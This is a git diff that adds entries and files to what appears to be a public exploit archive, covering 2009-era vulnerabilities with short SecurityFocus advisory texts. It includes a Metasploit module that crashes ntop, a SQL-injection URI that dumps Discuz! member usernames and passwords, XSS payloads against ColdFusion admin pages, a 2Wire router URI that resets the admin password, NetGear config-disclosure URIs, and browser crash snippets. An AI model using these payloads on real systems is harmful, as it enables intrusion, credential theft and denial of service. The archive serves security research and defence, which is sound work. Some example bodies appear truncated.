diff --git a/files.csv b/files.csv index d5558c54a..447d1b926 100755 --- a/files.csv +++ b/files.csv @@ -29898,3 +29898,17 @@ id,file,description,date,author,platform,type,port 33161,platforms/php/local/33161.php,"PHP 5.3 'mail.log' Configuration Option 'open_basedir' Restriction Bypass Vulnerability",2009-08-10,"Maksymilian Arciemowicz",php,local,0 33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0 33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0 +33164,platforms/multiple/remote/33164.txt,"WebKit Floating Point Number Remote Buffer Overflow Vulnerability",2009-08-11,Apple,multiple,remote,0 +33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0 +33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 '2fly_gift.php' SQL Injection Vulnerability",2009-08-15,Securitylab.ir,php,webapps,0 +33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 'admin/edit.asp' Authentication Bypass Vulnerability",2009-08-17,spymeta,asp,webapps,0 +33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (1)",2007-02-07,trevordixon,windows,dos,0 +33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (2)",2007-02-07,trevordixon,windows,dos,0 +33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (3)",2007-02-07,trevordixon,windows,dos,0 +33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0 +33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 +33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 diff --git a/platforms/asp/webapps/33171.txt b/platforms/asp/webapps/33171.txt new file mode 100755 index 000000000..91ed77f3e --- /dev/null +++ b/platforms/asp/webapps/33171.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/36049/info + +DUgallery is prone to an authentication-bypass vulnerability. + +An attacker can exploit this issue to gain unauthorized administrative access to the affected application. Successfully exploiting this issue will lead to other attacks. + +DUgallery 3.0 is vulnerable; other versions may also be affected. + +The following example URI is available: + +http://www.example.com/Accessories/admin/edit.asp?iPic=[PictureID] \ No newline at end of file diff --git a/platforms/cfm/webapps/33167.txt b/platforms/cfm/webapps/33167.txt new file mode 100755 index 000000000..136b27161 --- /dev/null +++ b/platforms/cfm/webapps/33167.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36046/info + +Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Adobe ColdFusion 8.0.1 and earlier are vulnerable. + +http://www.example.com:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'"> \ No newline at end of file diff --git a/platforms/cfm/webapps/33168.txt b/platforms/cfm/webapps/33168.txt new file mode 100755 index 000000000..d3b85ef83 --- /dev/null +++ b/platforms/cfm/webapps/33168.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36046/info + +Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Adobe ColdFusion 8.0.1 and earlier are vulnerable. + +http://www.example.com:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E \ No newline at end of file diff --git a/platforms/cfm/webapps/33169.txt b/platforms/cfm/webapps/33169.txt new file mode 100755 index 000000000..3125abaa7 --- /dev/null +++ b/platforms/cfm/webapps/33169.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36046/info + +Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Adobe ColdFusion 8.0.1 and earlier are vulnerable. + +http://www.example.com:8500/CFIDE/wizards/common/_logintowizard.cfm?>'"> \ No newline at end of file diff --git a/platforms/cfm/webapps/33170.txt b/platforms/cfm/webapps/33170.txt new file mode 100755 index 000000000..56cc1efe2 --- /dev/null +++ b/platforms/cfm/webapps/33170.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36046/info + +Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Adobe ColdFusion 8.0.1 and earlier are vulnerable. + +http://www.example.com:8500/CFIDE/administrator/enter.cfm?>'"> \ No newline at end of file diff --git a/platforms/hardware/remote/33165.txt b/platforms/hardware/remote/33165.txt new file mode 100755 index 000000000..8e003cc8d --- /dev/null +++ b/platforms/hardware/remote/33165.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/36031/info + +Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions. + +Unauthenticated attackers can leverage this issue to change the router's administrative password. Successful attacks will completely compromise affected devices. + +2Wire routers prior to Firmware version 5.29.135.5 are vulnerable. + +The following example URIs are available: + +http://gateway.example.net?xslt?page=CD35_SETUP_01 +http://gateway.example.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512* \ No newline at end of file diff --git a/platforms/hardware/remote/33177.txt b/platforms/hardware/remote/33177.txt new file mode 100755 index 000000000..5c018b97f --- /dev/null +++ b/platforms/hardware/remote/33177.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/36076/info + +The NetGear WNR2000 is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information. + +A remote attacker exploit these issues to obtain sensitive information, possibly aiding in further attacks. + +NOTE: Information obtained in attacks may be used in exploits targeting the vulnerability covered in BID 36094 (NetGear WNR2000 'upg_restore.cgi' Authentication Bypass Vulnerability). + +The WNR2000 with firmware 1.2.0.8 is vulnerable; other firmware versions may also be affected. + +The following example URIs are available: + +http://www.example.com/router-info.htm +http://www.example.com/cgi-bin/router-info.htm +http://www.example.com/cgi-bin/NETGEAR_WNR2000.cfg \ No newline at end of file diff --git a/platforms/linux/dos/33176.rb b/platforms/linux/dos/33176.rb new file mode 100755 index 000000000..b26cf69f9 --- /dev/null +++ b/platforms/linux/dos/33176.rb @@ -0,0 +1,57 @@ +source: http://www.securityfocus.com/bid/36074/info + +The 'ntop' tool is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when crafted HTTP Basic Authentication credentials are received by the embedded webserver. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. + +This issue affects ntop 3.3.10; other versions may also be affected. + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NTOP <= 3.3.10 Basic Authorization DoS', + 'Description' => %q{ + A denial of service condition can be reached by specifying an invalid value for the Authorization + HTTP header. When ntop recieves this, it attempts to base64 decode the value then split it based on + a colon. When no colon exists in the decoded string the username is left at its default NULL value. + During the authentication process the length of the username is computed via strlen(), which results + in a segmentation fault when it processes the null value. + }, + 'Author' => 'Brad Antoniewicz ', + 'License' => MSF_LICENSE, + 'Version' => '1', + 'References' => [ + [ 'BID', 'None'], + [ 'CVE', 'CVE-2009-2732'] + + ], + 'DisclosureDate' => 'Aug 08 2009')) + register_options( [Opt::RPORT(3000),], self.class ) + + end + + def run + begin + o = { + 'uri' => '/configNtop.html', + 'headers' => { + 'Authorization' => 'Basic A==' + } + } + + c = connect(o) + c.send_request(c.request_raw(o)) + + print_status("Request sent to #{rhost}:#{rport}") + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_status("Couldn't connect to #{rhost}:#{rport}") + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end diff --git a/platforms/multiple/remote/33164.txt b/platforms/multiple/remote/33164.txt new file mode 100755 index 000000000..6bcc12354 --- /dev/null +++ b/platforms/multiple/remote/33164.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/36023/info + +WebKit is prone to a remote buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. + +Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected. + + +Example 1: +--------- + +--------- + +Example 2: +--------- + +--------- \ No newline at end of file diff --git a/platforms/php/webapps/33166.txt b/platforms/php/webapps/33166.txt new file mode 100755 index 000000000..1a658e75a --- /dev/null +++ b/platforms/php/webapps/33166.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/36044/info + +Discuz! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Discuz! 6.0 is affected; other versions may also be vulnerable. + +The following example URI is available: + +http://www.example.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members \ No newline at end of file diff --git a/platforms/php/webapps/33178.txt b/platforms/php/webapps/33178.txt new file mode 100755 index 000000000..ec5025cc5 --- /dev/null +++ b/platforms/php/webapps/33178.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36086/info + +Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input. + +An attacker can exploit this issue to bypass cross-site scripting protections. Successful exploits can aid in further attacks. + +We don't know which versions of SiteMinder are affected. We will update this BID when more details become available. + +http://www.example.com/app/function?foo=bar%00 diff --git a/platforms/windows/dos/33173.html b/platforms/windows/dos/33173.html new file mode 100755 index 000000000..b32938c13 --- /dev/null +++ b/platforms/windows/dos/33173.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36070/info + +Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability. + +Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed. + +Versions prior to Internet Explorer 8 beta 2 are vulnerable. + + IE Crash Example \ No newline at end of file diff --git a/platforms/windows/dos/33174.html b/platforms/windows/dos/33174.html new file mode 100755 index 000000000..057442129 --- /dev/null +++ b/platforms/windows/dos/33174.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36070/info + +Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability. + +Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed. + +Versions prior to Internet Explorer 8 beta 2 are vulnerable. + + IE crash bug

IE crash bug test

\ No newline at end of file diff --git a/platforms/windows/dos/33175.txt b/platforms/windows/dos/33175.txt new file mode 100755 index 000000000..c0da8e8e5 --- /dev/null +++ b/platforms/windows/dos/33175.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36070/info + +Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability. + +Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed. + +Versions prior to Internet Explorer 8 beta 2 are vulnerable. + +document.createElement('li').setattribute('value', 'KillIE7');